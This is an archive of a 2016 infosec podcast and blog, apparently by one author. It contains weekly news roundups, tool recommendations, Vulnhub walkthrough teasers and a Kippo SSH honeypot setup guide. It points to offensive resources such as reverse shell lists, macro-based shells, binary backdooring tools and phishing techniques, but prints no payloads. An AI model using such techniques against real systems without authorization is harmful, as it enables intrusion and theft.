- Dropbox was not breached (but Lifelock seemed to think so). And there was much chatter of a possible TeamViewer breach this week as well, but compromises of those accounts appear to be password reuse/abuse, as TeamViewer states . I actually like their statement from a few weeks ago as it uses user-shaming verbiage:
- On a related note, after the LinkedIn breach, Microsoft won't let you use hacked passwords anymore.
- Passwords aren't cutting it, so Google plans on using biometrics to replace passwords:
- Wanna learn how to hack Wordpress? Try what this guy did with some curiosity and a desire to learn . Note: obviously only do this on a test/lab system you have permission to hack. The author's takeaways:
- Would you like a 0-day that works on versions of Windows from 2k to fully patched Windows 10? It'll only set you back 90 grand ! The vector is local privesc, so it won't be able to pwn a machine by itself, but helps overtake an already compromised system:
- Interested in sorta living off the grid? This biker's lifestyle might be the right one for you.
- Facebook ads now track you, even if you don't have an FB account!
- Need to launch some evil Office macros for shells against OSX? Using Empyre is probably your best bet.
- Here's a great list of common reverse shells I hadn't seen before.
- Need to run Burp and Firefox in browser? Then check out BurpBrowser !
- I passed my Kung Fu blue belt test ;-)
- I love this video of Jimmy Fallon and Bradley Cooper unable to control themselves while talking about Cooper's role in a broadway play:
View this episode's show notes for more information
Published: Thursday, June 02, 2016
Got two amusing pentest stories for you today in today's podcast episode:.
- One about finding a XXE vuln in a popular commercial product.
- One about an employee who did a Webapp pentest on a product as it was being pitched to him
View this episode's show notes for more information
Published: Tuesday, May 31, 2016
IntroThe following is a semi-spoilerish walkthrough of the SickOS 1.2 VM from Vulnhub by @D4rk36 .DisclaimerI'm intentionally not posting a full walkthrough for a few reasons:Full (and better)...
View this episode's show notes for more information
Published: Friday, May 27, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral News“Whoever set up their home network like that was a security idiot, and it’s a dumb thing to do,” Guilmette said. “Not just because any...
- The BHIS Webinar this week on external attacks was good stuff. The YouTube video and slides are up. The key highlights I came away with:
- BHIS has found great success in using infected Powerpoints to trigger shells
- Macro_safe.py - helps turn commands such as Powershell strings into safe text for easy copy/paste. Trims long lines into smaller lines, helps reduce errors, etc.
- BHIS is a big fan of The Backdoor Factory , the goal of which is "to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state."
- There was a free Burp book available for a brief amount of time at Packtpub.com . Thanks @xoke for this link!
- Wanna practice your SQLi skills? Check out this walkthrough from canyoupwn.me . Note: Canyoupwn.me also authors some great vulnhub.com VMs like Kevgir . Another note: Canyoupwn.me is in Turkish, so Google Translate is probably your friend.
- Beef up your Powershell skills with a great cheat sheet from SANS .
- Although it wasn't confirmed whether Hilary Clinton tech team had an Internet-facing printer live on the Internet, it appears to have been configured that way (such as a DNS name of printer.clintonemail.com being created). According to the article, private security researcher Ronald Guilmette had some harsh criticisms about the setup:
- Twitter's loosening the 140-character chokehold .
- ISIS fanboys intending to strike fear by showing global support for the organization at a meeting this week instead revealed their GPS coordinates according to the article:
- Tired of manually hunting around SMB shares for potentially sensitive information? SMBCrunch might be your new best friend.
- Need to make your phishing campaigns a little more seamless? Check out this good advice on leveraging Facebook and iframes .
- Is it pronounced "jif" or "ghif"? This tweet might settle it once and for all.
View this episode's show notes for more information
Published: Wednesday, May 25, 2016
This episode is why AppSpider is grinding my gears right now. I have found a site that, when scanned, will cause AppSpider to go ka-blooooey!
View this episode's show notes for more information
Published: Monday, May 23, 2016
IntroThe following is a semi-spoilerish walkthrough of the Simple VM from Vulnhub by @RobertWinkel .DisclaimerI'm intentionally not posting a full walkthrough with all the...
View this episode's show notes for more information
Published: Friday, May 20, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingThe vast majority of attacks originate from the outside of your network. Be it remote attacks, email attacks or social engineering the external...
- The recording of the BHIS Webinar about hardware hacking is now up - here's the YouTube video and slide deck .
- Another BHIS Webcast is coming up May 24 from 3 p.m. - 4 p.m. EST, described as:
- I'm still working on the CCSP but have switched gears from ITPro.tv training to the Cybrary.it offering and I love it. The modules are concise, straight to the point and only a few minutes per episode. I'm working on a down n' dirty study guide that I'll share when complete!
- Ed Skoudis has a fantastic presentation (from Derbycon 2014) on how to give the best pentest of your life . Moral of the story: focus less on pwnage, and more on providing value to the target organization. Some must haves:
- Great documentation
- Compliment them on something they're doing well
- Got 0-days? Burn 'em on the pentest if you got 'em!
- Perform client-side attacks (if it's PCI, you need to test both sides of the client environment, so try some client-side attacks to pop a box that can get into the card environment)
- Play the "0-day card" and get access to one client machine. Alternatively, ask them to model a user who can run an app or apps (av evasion). Or ask for a general account and demonstrate breaking out of it.
- Stay within scope, but ask for scope creep if deemed valuable to the pentest & org.
- Clean up after yourself - closing down listening tools and ports, etc.
- Learn how to hack from the hacker behind The Hacking Team ...uh, hack. Wow, that was a lot of the word hack in one sentence. Anyway, looks to be an awesome video if you can find it (it's been yanked from YouTube).
- Lots 'o breaches, as appears to be the norm these days!
- Noodles
- Wendy's
- LinkedIn's breach from 2012 has expanded. It was originally thought that 6.5 million accounts were compromised, but it looks like we're more in the 117 million neighborhood. Ugh. Change your password!
- Symantec Antivirus has a big vulnerability allowing remote code execution. This was discovered by Google researcher Travis Ormandy. Softpedia 's article on the matter notes:
- Yikes, I didn't know it wasn't safe to trust Target=_blank in URLs! Read why in this Medium article which doesn't use Target=_blank ;-)
- Windows 10 will no longer share your wifi passwords with friends. Um, thanks for disabling a feature nobody wanted?
- Did John McAfee and his team crack into encrypted WhatsApp messages ??? Spoiler alert: no. He's kind of becoming the infosec version of Kim Kardashian in this analyst's humble opinion. I think I'll stop reporting his attention-seeking behavior unless there is harder news to share.
- Tumblr lost some account info so you should probably change your password.
- Twitter is not going to count links and pics in the character count. Hurrah!
- Here's everything we know about how the FBI hacks us , a fascinating read starting with 2001's Carnivore to today's more advanced watering hole and drive-by attacks.
- Got 7-Zip? Update it as the current version contains two serious flaws allowing RCE.
- XSSHunter looks freakin' sweet :
- Gobuster looks to be an interesting DNS/file/folder brute-forcer. Why build another one? According to the author:
- Need to figure out if your iPhone has been secretly hacked ? An app called System and Security Info might help you do just that:
- Phone battery not making it through the day? These 5 apps might be sucking too much juice.
- This might be the best picture in the world for explaining software security .
- Congress hopeful Mike Webb posted a screenshot full of porn tabs and, once called on it, offered one of the most confusing, random explanations I've ever read. It made me do this:
View this episode's show notes for more information
Published: Wednesday, May 18, 2016
In today's off-topic episode I talk about:Oh, and be sure to check out my interview with Jay Schulman on his Building a Life and Career in Security podcast. Here's a [direct link to the episode I'm...
- Why you should blog/podcast/scream/shout about topics you are passionate about because you will find an audience.
- Why I'm "blogging like nobody's reading" at brianjohnson.tv .
View this episode's show notes for more information
Published: Monday, May 16, 2016
IntroThe following is a semi-spoilerish walkthrough of the Kevgir VM from Vulnhub by canyoupwn.me .DisclaimerI'm intentionally not posting a full walkthrough with all the juicy...
View this episode's show notes for more information
Published: Friday, May 13, 2016
TrainingGeneral NewsIn total, Microsoft released 16 bulletins today, eight critical and eight deemed important. There are also 33 unique CVEs being resolved, including one Zero Day that affects two bulletins and two public disclosures.Today, Adobe released bulletins for Adobe Reader, Cold Fusion...
- If you're interested on whether it's time to invest in "smart things" for your home, you might want to listen to the latest Security Now episode first. About 1.5 hours in, Steve and Leo talk about the current state of smart/dumb things development, and warn that the tech might not be mature enough to operate securely at this time. Plus, once the dust settles on the ioT frontier, you might end up having to re-buy a lot of tech.
- The BHIS Webinar from yesterday called "We can hardware hack! And you can too!" was good. I know absolutely zero about hardware hacking, but this presentation wanted to make me want to start :-). I'll post the recording when available.
- I'm still pursuing CCSP but kind of going bonkers at how high level it is.
- Patch your stuff for goodness sake - Adobe/Microsoft/others have lots of critical ickiness that was patched this week. Krebs covers the overview well (as always) but don't forget Shavlik produces a nice summary too. Highlights from the Shavlik article include:
- A big week for breaches including Kiddicare , UserVoice , Google , and a London-based HIV clinic. One lesson learned from these: learn how to use email properly (i.e. BCC field) and don't email sensitive stuff to the wrong people :-/
- Oh, and if you're looking for a bit more of a blush-worthy breach, a fisting site got, um, pounded (sorry, couldn't help it). Lesson learned? Keep your forum software up to date .
- Lenovo's Solution Center may soon recommend the following solution to using a Lenovo machine: don't. The flawed software could let attackers leverage Solution Center to take over a machine. According to the article:
- WhatsApp now has desktop clients for Win and Mac users for a bit more mainstream access to end-to-end encryption goodness.
- OWTF (Offensive Web Testing Framework) is OWASP's:
- Be careful when flying, as it's no longer safe to do algebra in front of nervous passengers!
- A whole slug of 7ms.us updates!
- The complete episode guide is finally up! It's broken into two chunks: featured episodes and complete episode guide.
- Disqus comments are finally fixed. Apparently they load via HTTP even though this is an HTTPS-forced site. #LessonLearned.
- Resources page has some mini best practice articles as well as blogs, podcasts, books, etc. that have helped me in my infosec career.
- All podcast episodes should be fixed and downloadable - thanks to the listeners who pointed out issues. Let me know if you see any that are being stubborn!
View this episode's show notes for more information
Published: Wednesday, May 11, 2016
Today's off-topic episode features two mini movie reviews:TumbledownJason Sudeikis plays a writer who travels to a small town to interview a famous musician's widow. To nobody's surprise, he starts falling for her.The Family FangJason Bateman and Nicole Kidman play a bro and sis who investigate...
View this episode's show notes for more information
Published: Monday, May 09, 2016
IntroThe following is a semi-spoilerish walkthrough of the DroopyCTF VM from Vulnhub by Knightmare .DisclaimerI'm intentionally not posting a full walkthrough with all the...
- Note: My experience with this VM is that sometimes after a reboot, the Web service would be in a crashed/broken state, which forces you to reimport the VM from scratch. Eventually I just did a fresh import, got the network config'd the way I wanted it, and made a snapshot. That way you can just roll back with easy if the VM gets borqued.
View this episode's show notes for more information
Published: Friday, May 06, 2016
TrainingGeneral News"Thank you for being a subscriber and letting us help alert you of any risks related to your personal credentials. PwnedList launched in 2012 and quickly become the leader in open-source compromised data aggregation. In 2013 PwnedList was acquired by InfoArmor, Inc. a provider...
- A few weeks ago BHIS did a Webcast on "0-day/stunt hacking" and the recording of the presentation is now up here .
- On Thursday, May 12 at 2 p.m. EST BHIS will do a "We can hardware hack! And you can too!" Webinar that you can sign up for here .
- PwnedList got pwned . You can see my mini tweet thread with InfoArmor, and in my opinion, they're downplaying the issue. But their Web site makes it seem like a slightly bigger deal:
- ImageMagick has a nasty vuln making it susceptible to remote code execution. All it takes is tinkering with the "magic bytes" (first few bytes used to identify a file as gif, jpeg, etc.). Check out the PoC . And also bookmark ImageTragick for updates as they become available, because at the time of this writing a patch was not available, but the ImageMagick team did dev a workaround .
- Satoshi Nakamoto, a.k.a. Craig Wright, steps forward! Well...kinda. To prove it, the article says several users were going to:
- PCI DSS 3.2 is out, and Tenable does a nice job of summarizing what you need to know .
- Looking for a personal VPN solution? I use ProXPN but saw a deal for 50% off F-Secure's Freedome which I know many people (like Troy Hunt ) use.
- Are any of you Ghost bloggers? Then be sure to grab the new desktop app !
- If you've ever wanted to slurp down the entire Web history of your domain's existence, the Waybackpack tool will do the job.
- For seasoned travelers, this list of wireless passwords from airports around the world could be handy. Most entries looked to be in the Europe area, but still, cool stuff!
- PowerShell Empire now has a Web interface !
- Prisoner takes selfies in police van and posts them on FB! The prisoner in question, Shane Holbrook, had...
- Will Ferrell and Red Hot Chili Peppers drummer Chad Smith recently had a drum-off rematch that is pretty fantastic.
- If you're off your rocker and want to run Win95 on your watch, check this out .
View this episode's show notes for more information
Published: Thursday, May 05, 2016
Today's off-topic episode contains two mini movie reviews:BrooklynA coming of age movie about a woman who moves from Ireland to Brooklyn to explore career opportunities and maybe even find love!The RevenantLeo DiCaprio gets mauled by a bear and left for dead. Boy oh boy is he ticked about it!...
View this episode's show notes for more information
Published: Tuesday, May 03, 2016
IntroThe following is a semi-spoilerish walkthrough of the Lord of the Root VM from Vulnhub by KookSec .DisclaimerI'm intentionally not posting a full walkthrough with all the juicy...
View this episode's show notes for more information
Published: Friday, April 29, 2016
TrainingGeneral News“I was able to easily verify people's passwords with them simply by Googling them, such is the joy of unsalted MD5..."“A trained monkey could have protected [this database],” says Vickery, with a more blunt assessment. “That’s how easy it is to protect. It’s an incredible...
- I still haven't seen the slides/video come across for last week's BHIS "Gorilla Webcast!! VPN 0-day and stunt hacking" training. I'll keep an eye out for it.
- Verizon's Data Breach Investigations Report is out and Tenable sums up the high points if you want a Cliff's Notes version:
- "Time to compromise is minutes (81.9%), while time to exfiltrate data is between days (67.8%) and minutes (21.2%)."
- "...the mean time from the start of a phishing campaign to first click is 3 minutes and 45 seconds. In less than 4 minutes, an attacker can gain a foothold on your network."
- "63% of breaches used weak and/or default credentials."
- "99.9% of the exploited vulnerabilities were compromised more than a year after the CVE was published..."
- In short: We're still not getting the basics right like active patching, 2FA, effective network segmentation and monitoring.
- Spotify hacked - maybe. Several outlets reported a list of Spotify usernames/passwords in the wild, but Spotify denies a widespread breach - even to me directly via Twitter DM. Good to change your password just in case, though.
- 7 million accounts from the popular Minecraft community called Lifeboat were hacked , and unfortunately were only protected with MD5. Troy Hunt says:
- A site designed only for "beautiful people" was breached by allowing open MongoDB databases to be exposed to the Internet with little to no security protections. Security researcher Chris Vickery says it a bit more bluntly:
- The company TruckersMP did something shocking - they responsibly disclosed a breach to HaveIBeenPwned . Why? The sysadmin explains:
- Krebs reports that the American Dental Association has mailed some USB sticks full of malware to customers. A DSL Reports Security Forum user summed up what was likely the collective reaction this way:
- British intelligence agencies are dumping Lenovo machines because:
- Jigsaw ransomware uses scare tactics to spook victims into paying. It also uses some shame/blame tactics to rub it in a bit:
- When I've been working on [VulnHub] boot2roots, kernel-exploits.com has come in very handy.
- Want to simulate ransomware to assess damage from something like Cryptolocker without harming your network or data? Check this script out. Here's a demo:
- The PenQ security browser bundle looks like an interesting all-in-one OWASP pentesting browser. Check out the video:
- Here's a nice netcat cheatsheet .
- And also a nice scapy cheatsheet .
- Microsoft knows how ticked you are , meaning that our emotions are probably not any more safe than our data.
View this episode's show notes for more information
Published: Thursday, April 28, 2016
A movie review of The Invitation . Rotten Tomatoes reviewers loved it! I thought it was decent, but have some gripes. I think in general, these ensemble suspense thrillers - where apparently only one dude is suspicious of the people acting funny...
- Creating characters we actually care about.
- Not making the lone dude the only one suspicious of weird things going on.
- If you're casting mostly unknowns, don't cast a characters actor known to do creepy stuff or he's automatically a suspect!
- Don't do cheap computer "discovery" scenes where one of a few things happen:
- Character comes across computer with no password.
- Character comes across computer with no password and an important file he needs is the only one on the desktop - or better yet, already open.
View this episode's show notes for more information
Published: Monday, April 25, 2016
IntroThe following is a semi-spoilerish walkthrough of the SickOs VM from Vulnhub by D4rk .It has (as best I can tell) a sequential pwnage path, meaning that I think you could read this write-up...
View this episode's show notes for more information
Published: Saturday, April 23, 2016
TrainingGeneral NewsTools/ScriptsMisc/Humor.
- The BHIS "Gorilla Webcast!! VPN 0-day and stunt hacking" slides should be up soon. Will post 'em in next week's roundup.
- Tim Tomes is teaching a special edition of his Practical Web Application Pentesting course in Charleston and Spartanburg, SC. Check out his page for specific dates, but this offering is of particular interest because there's an extra day of dev-focused content. I'd definitely go if I could!
- I started taking the CCSP through ITPro.tv . Decent so far, but mostly a lot of really high level concepts without a lot of hands-on, practical advice. But maybe that's just how the cert/training is designed.
- The person behind The Hacking Team hack did a write-up of how the breach occurred. It's a gripping read, summed up nicely here or here or you can read directly here or here . My favorite bit is probably how the attacker tested his exploits many times on other vulnerable companies before pulling the trigger on The Hacking Team.
- Webhost 123-reg accidentally deleted everything on their customer sites. Read through some of the horror stories. They'll make your skin crawl. Then take this time to go backup all your stuff :-). There seems to be some dispute on whether this is indeed the same company/individual who posted on Serverfault asking how to recover from an "rm -rf" - yikes!
- Fascinating story about a hacker going on a Facebook bug bounty only to find some FB virtual properties already hacked .
- The NYPD's campaign for #UnlockJustice massively backfires .
- A tool was released for Mac OS to help detect installed ransomware . You can download it at objective-see.com .
- Need an easy way to record gifs on your Mac? This Gifox app looks pretty slick.
- The average Web page is about as heavy as the install of Doom . Wow!
View this episode's show notes for more information
Published: Thursday, April 21, 2016
The following is a semi-spoilerish walkthrough of the Skydog CTF VM from Vulnhub by James Bower . It contains 5 flags, all of which have to be captured sequentially (I'm pretty sure) so I don't...
- Flag #3
- A hint that discovering flag #4 would take some serious OSINT.
View this episode's show notes for more information
Published: Monday, April 18, 2016
In this episode I talk about how I took my aging Mac Mini and gave it some reasons to live! By installing a $20 app you can make your old Mac cache software updates, host Time Machine network backups, become a DHCP/DNS server, push...
View this episode's show notes for more information
Published: Friday, April 15, 2016
TrainingGeneral News..."it isn't at all surprising, as the iPhone in question was one of three used by Farook and his wife. The FBI previously admitted that both of them had destroyed their personal iPhones that were found crushed and dumped in a trash at his...
- The BHIS 5 Months/Critical Controls Webcast recording slides are now available .
- Tim Tomes is teaching a special edition of his Practical Web Application Pentesting course in Charleston and Spartanburg, SC. Check out his page for specific dates, but this offering is of particular interest because there's an extra day of dev-focused content. I'd definitely go if I could!
- Badlock is out , but it's more like Sadlock . The vuln's biggest risks are MITM and DOS attacks, so you should still patch, but it appears to be more hype than pain.
- Nothing interesting found on the San Bernardino shooter's iPhone. According to the article:
- Do you use Quicktime for Windows? Uninstall it now as it's unsupported and it has two new critical vulns.
- It's crucial that you take extreme caution when using the command rm -rf as a man running a Web hosting company essentially put himself out of business with those keystrokes. The Serverfault thread has been taken down but was amusing (and depressing...and ruthless).
- Get your iDevices up to the 9.3.1 update ASAP, or you could get bricked on a rogue network .
- Get your Kali 2 boxes updated! Kali 2 switches to "rolling" config, and after April 16, the existing repos won't get updated. Head here for instructions. It's pretty easy. Just make sure you have lots of time, patience and disk space.
- The "Textalyzer" could analyze your phone's data after an accident and, if proven you were texting, you could be in big trouble! I'm all for this! And I better...ahem...change my habits a bit.
- File.pizza is a cool way to send files encrypted, end-to-end, through a browser. I just haven't been able to get it to work :-(.
- Gladius combines Responder + Hashcat to make cred-cracking a bit more automated.
- Burp Suite has introduced projects which look to be a great way to save and organize your pentest data.
- Dude just beat Super Mario Bros in record time. This is a fun watch, and makes me incredibly nostalgic.
- Remember Mike Tyson's Punch-Out? An Easter egg was discovered revealing when you should punch Piston Honda. Can't believe nobody found this after 20+ years!
- Somebody turned an NES Duck Hunt gun into a glock !
- Four US radio stations were hijacked with "furry" content due to public-facing Barix devices with weak passwords. According to the article, the Michigan Association of Broadcasters sent an advisory containing this warning:
View this episode's show notes for more information
Published: Thursday, April 14, 2016
In this episode I talk about a not completely sucky way to backup and share photos seamlessly (almost) from multiple phones.Long story short: my wife and I used to use Dropbox's Carousel app and we loved it. Then, at the end of March, it was retired (insert sad face). So now we're trying this...
View this episode's show notes for more information
Published: Monday, April 11, 2016
Recently I covered the Kippo SSH honeypot ( part 1 | part 2 ) and a few folks brought to my attention that this project was a little long in the tooth, and had been superseded by...
- dl - this folder has copies of files that "hackers" download during their session.
- utils/playlog.py - plays back user sessions in an asciinema style presentation.
View this episode's show notes for more information
Published: Friday, April 01, 2016
TrainingAre you comfortable with the basics of Metasploit, but still struggle with using it efficiently? Do you feel like there's much more there that you haven't taken the time to learn? This webinar will take you beyond individual exploits and explore some of the more advanced features of...
- Check out this Beyond the Shell Webcast from Secure Ideas coming up Thursday, April 7 from 2:00 p.m. - 4:00 p.m. CST. Their training modules are fantastic, and fairly priced at just $25 a pop. Collect 'em all! Webinar summary:
- BHIS has a New Security Team Bootcamp coming up Monday, April 11 from 11:00 a.m. - 12:00 p.m. CST.
- The FBI does not need Apple's help in unlocking the San Bernardino iPhone! As usual, Bruce Schneier sums the issue up elequently. His blog entry was edited to include:
- A water treatment plant was popped and that sorta makes me poop myself. The plant name/location are anonymous - the article refers to the plant as Kemuri Water Company, or KWC. Some highlights from the article:
- Facebook is trying to stop account impersonation but the article author asks a great question: What if an account impersonator joins FB before the real account user?
- Windows is gonna run Linux and that's weird/sexy/cool/scary/fun...depending on how you look at it.
- Heralding lets you setup a simple cred-catching honeypot:
- This awesome pentest resource certainly lives up to its name. This is kinda what I want to do with BPATTY .
- I cannot wait to try out Bettercap except that it doesn't work for me . When I finally get it working, though, I'm totally going to grab some NTLM hashes .
- This real time Web log analyzer looks like it would give some cool stats sorta like Google Analytics.
- Don't want your Windows 7 or 8 machine to ever bug you about installing Win 10? Check out Steve Gibson's "Never 10" utility. While you're at it, why not make your system a little safer against macros ?
- Microsoft's AI Twitter bot, "Tay," had to be shut down a day after its launch after turning into a racist, sexist Nazi.
- Looks like Google's April Fool's joke majorly backfired and they've since pulled the gag .
View this episode's show notes for more information
Published: Thursday, March 31, 2016
In this episode I took my Kippo installation to the next step by incorporating mysql. First thing I did is connected to my mysql instance:mysql -u root -pThen, I created an empty kippo database:create database kippo;Then I granted all...
- https://bruteforce.gr/logging-kippo-events-using-mysql-db.html
- http://www.cyberciti.biz/faq/import-mysql-dumpfile-sql-datafile-into-my-database/
- http://www.edgis-security.org/honeypot/kippo/
View this episode's show notes for more information
Published: Tuesday, March 29, 2016
Interested in having some fun with Kippo (an SSH honeypot) on your Digital Ocean server? Here's a super fast getting started guide based on this doc :More to come. From here I want...
- Do an apt-get update && apt-get upgrade
- Open etc/ssh/sshd_config
- Change the port to be some odd port you want to use for legit SSH management, like 9999 or 1357.
- Restart ssh with reload ssh
- Install Kippo dependencies with apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted
- Get subversion to install kippo with apt-get install subversion
- Create kippo user with useradd -d /home/kippo -s /bin/bash -m kippo -g sudo
- Install authbind with apt-get install authbind
- Create a file called /etc/authbind/byport/22
- Set ownership on it with chown kippo /etc/authbind/byport/22
- Change permissions on it with chmod 777 /etc/authbind/byport/22
- Change to the kippo user with su kippo
- Hit cd to go to kippo home dir.
- Download kippo SVN with svn checkout http://kippo.googlecode.com/svn/trunk/ ./kippo
- cd to kippo dir with cd kippo
- Move and rename default config file with mv kippo.cfg.dist kippo.cfg and then open it
- Change the ssh_port from 2222 to 22
- Start the kippo service with ./start.sh
- Start tailing the /home/kippo/kippo/log/kippo.log file to see authentication attempts!
View this episode's show notes for more information
Published: Monday, March 28, 2016
TrainingLearn how to take your security awareness program to the next level as Bob Rudis, Lance Hayden, and Lance Spitzner cover key findings from the 2016 Securing the Human Security Awareness Report. Specifically the top two challenges facing security awareness teams and how organizations are...
- BHIS did a Webinar called "Internal Pivot Pentest Go Kit" this past Tuesday. They've posted the slides and video for your enjoyment.
- After last week's question about whether a itpro.tv subscription was worth it. A few listeners wrote in and some of their comments:
- Compare ITPro to Safaribooksonline before making a choice.
- Safaribooksonline app keeps you logged in, has good queue functionality, and remembers where you left off in a video. ITPro app seems less functional - short logout times, doesn't remember where you were in a video, and doesn't remember your course progress.
- ITPro seems to tempt the "demo gods" and aren't always successful. Safaribooksonline content may be a bit more polished.
- ITPro might be geared a bit more towards a younger audience.
- Brutelogic - check him out on Twitter and sign up for his blog emails email notifications. If you want to get some of his deep, dark XSS secrets, consider subscribing to his premium account .
- SANS is doing a Webinar on the 2016 Security Awareness Report Key Findings on Tuesday, March 29 at 10am CST. Overview:
- Offensive Security did a live demo (via IRC) of the Kali "ISO of doom thing." I have the transcript if you want it, otherwise keep an eye on http://offsec.me .
- Confused about CSRF? Definitely check out Troy Hunt's video editon explanation of this attack.
- Tim Tomes is teaching PWAPT in Charleston, April 28-29 . Fly to it if you have to - it's a fantastic course!
- Hacker explains how he stole all the nudie pics of female celebs using ultra l33t super tight h4x04 sk1llz. Aka phishing. :-)
- The Badlock bug is going to pwn all of your Samba on April 12th.
- FBI apparently doesn't need Apple's help cracking into that iPhone after all.
- Locky ransomware locks up a hospital , triggering an "internal state of emergency."
- EC-Council is infecting visitors with ransomware. And don't seem to care.
- You can upload and download files quickly from shell using transfer.sh.
- A great cheat sheet on using PowerView .
- Pentester lab has a nice bootcamp you can attend (virtually) for a "learn it yourself" primer to pentesting.
- Pwnwiki offers great sources for "What to do in a pentest after access has been gained."
- On that note, if you've knabbed low-priv permissions on a well-patched Windows box, Netripper might be your new best friend.
- This is my favorite tweet about Apple v. FBI when the feds suddenly decided not to go to that hearing.
- A poll to name a freakin' huge boat came to a conclusion, with Boaty McBoatface the clear winner.
- The BPATTY doc has some updates! And is now linked on homepage!
- Oh, and I'm trying to get BPATTY into Github .
View this episode's show notes for more information
Published: Thursday, March 24, 2016
This is probably the most off-topic of all off-topic episodes - in that the topic isn't really a topic at all. Instead, I offer up two of my favorite worship songs to get us in an Easter mindset for the weekend. Have a listen. I hope you enjoy it, and that it blesses your day.
View this episode's show notes for more information
Published: Tuesday, March 22, 2016
I had some fun this weekend doing a subset of pentesting in the "vacuum" I've told you about. As a quick background for those of you just joining the series, I help manage (from a pentesting POV) 20 Kali boxes that are all in their own network silos. They can't talk to each other, they can't talk...
View this episode's show notes for more information
Published: Saturday, March 19, 2016
TrainingGeneral NewsAdditionally, for the malware to spread to an iOS device, users must have mistakenly installed a corrupted program on their Windows-powered PC to help manage their iOS device. Instead of helping a user backup their iPhone, however, the program covertly installs “malicious apps...
- Tim Tomes is teaching PWAPT in Charleston, April 28-29 . Fly to it if you have to - it's a fantastic course!
- BHIS has a Webinar called "Internal Pivot Pentest Go Kit" they'll be doing on Tuesday, Mar 22 at 11:00 a.m. CST. I definitely plan on attending .
- I'm kind of interested in an itpro.tv subscription since Security Now listeners get 30% off for life. Anybody have any experience with this program?
- As always, the Apple case is making lots of news. The FBI threatened to force Apple to hand over iOS source code and there's also a great Time article featuring an interview with Tim Cook and a deep exploration of the case and Apple's position.
- In other Apple news, malware called AceDeceiver can pwn your info and passwords if you install a malicious Windows app to go along with it. From the Fortune article:
- LastPass introduced a two-factor auth app that appears to be a Google Authenticator competitor. I don't see a huge push to move to this, but might in the future just to have all my password "eggs" in one basket.
- Brian Krebs has been seeing many companies fall to W2 scams lately. Seagate, Moneytree, and potentially many more. Per his article:
- Stagefright is back for Android (oh noes!) if an attacker tricks you into visiting a page with a malicious multimedia file. This affects Android versions 2.2 to 4.0 and 5.0 to 5.1. Oh, and while you're investigating that vulnerability, see if you're running anything with the nasty Snapdragon vulnerability affecting more than 1 BEEELION devices!
- If you're an email privacy enthusiast, definitely go and check out ProtonMail , featuring end-to-end encryption. I'm using it if you want someone to test with (see the contact page . You can even send password-protected, time-sensitive emails to people who don't use the service. I'm a fan!
- I used egresscheck-framework for the first time to test network segmentation and it worked like a champ! I'll add it to BPATTY soon.
- The MOARTLS is a cool Chrome plugin to test whether all elements on a site/page use HTTPS.
- NMAP 7.10 is out and has lots of new NSE scripts and other goodies. Will grab it this weekend.
- Anonymous has (kinda?) hacked Trump's info .
- The BPATTY doc has some updates!
- I'm now a 2nd degree green belt in Kung Fu :-).
View this episode's show notes for more information
Published: Thursday, March 17, 2016
This weekend, while I was comforting my barfing son, I did some securing and tune-up work on this blog, which is a Ubuntu Digital Ocean droplet running on the Ghost blogging platform. Here's the spit and polish that was applied:Secure the site with SSH keysI used [this...
- PasswordAuthentication no
- UsePAM no
- PermitRootLogin without-password
View this episode's show notes for more information
Published: Thursday, March 17, 2016
TLDR: Before I'd do another SOAP Web services test, I'd ask (demand) the following from the dev team:Now here's the long version:I was asked to run a site through an AppSpider scan, and my first challenge was that this site redirected to an SSO page. I was having issues with that, so I ended up...
- WSDLs for all services in scope
- SoapUI project file populated with valid request for each Web service (so I can distinguish responses and app behavior).
- Clicked Options->Sessions
- Edit the "Use Cookies from Burp's Cookie Jar"
- Click Scope
- Click the Proxy checkbox
- Click Use Suite Scope (make sure your site scope is defined)
View this episode's show notes for more information
Published: Friday, March 11, 2016
TrainingGeneral NewsMicrosoft’s claim that Edge is more secure than IE seems to be holding out, albeit not by much. So far this year, Shavlik found, Edge has required 19 fixes versus IE’s 27.If you patched Flash on Tuesday be sure to do it again as...
- BHIS released the recording of their Webcast on New and Improved Ransomware from last week. Here are my notes from the Webinar.
- A great Hacking Webapps course is only $10 when you use the code TWITTER. This is one of the first Webapp hacking courses I ever took and was well worth the price.
- BHIS has a Webinar called "Internal Pivot Pentest Go Kit" they'll be doing on Tuesday, Mar 22 at 11:00 a.m. CST. I definitely plan on attending .
- This week was patch Tuesday so patch all your stuff . Many updates are for IE or Edge, which Shavlik says is proving to be a bit more secure as promised, but not by much:
- Seagate W2 information got pwned . Ouch. How many records? According to the spokesperson:
- A researcher found a legitimate (but potentially slow and painful) way to hack any Facebook account and got paid $15k for bringing it to FB's attention. Oh, and the vuln is now fixed :-)
- The Transmission Bittorrent client download was compromised for a short time last weekend, infecting about 6,500 users with a Mac ransomware called KeRanger. It lays dormant in a machine for a few days before contacting CnC servers and receiving specific instructions to encrypt files. Transmission released an update to block/remove the malicious install, and Apple has updated its software protections to prevent new infections from the bad image.
- Amazon is removing encryption from their Fire tablets! OMG OMG OMG OMG! Oh wait...they have reversed the decision .
- The Cachebleed vuln is kinda scary, but check out episode 550 of security now (about the last 30 minutes or so) to have some peace of mind. The sky isn't falling. Yet.
- testssl.sh is one of my new fav tools for checking SSL/TLS, and...
- This is one of my go-to pages for testing SSL/TLS .
- Remember when John McAfee said he could crack into the San Bernardino iPhone easy-peasy? Yeah, he probably can't and admits he just did it to get a "s***load of attention."
- Seen that video about unlock an iPhone without the password using Siri? Yeah, that's bogus too.
View this episode's show notes for more information
Published: Thursday, March 10, 2016
Well, my first choice for topic today (DIY retro gaming console) fell through (ARGH!) so today I chat about another topic people ask about: what tools/services go into making a podcast. Here's my setup in a nutshell:.
- Podcast content hosted by Zencast
- Blog running on Ghost on a Digital Ocean droplet.
- Record audio using Dropvox with occasional tweaks using Audacity .
View this episode's show notes for more information
Published: Monday, March 07, 2016
This is a continuation of episode #158, in which I described my challenges in creating a 20-server Kali environment with no Internet access.In this episode I talk about how I've figured out (I think) how to keep these systems patched without blindly opening http/https access to the Internet, and...
View this episode's show notes for more information
Published: Friday, March 04, 2016
TrainingGeneral News"Ultimately, the question to be answered in this matter, and in others like it across the country, is not whether the government should be able to force Apple to help it unlock a specific device...[]...It is instead whether the All Writs Act resolves that issue and many others...
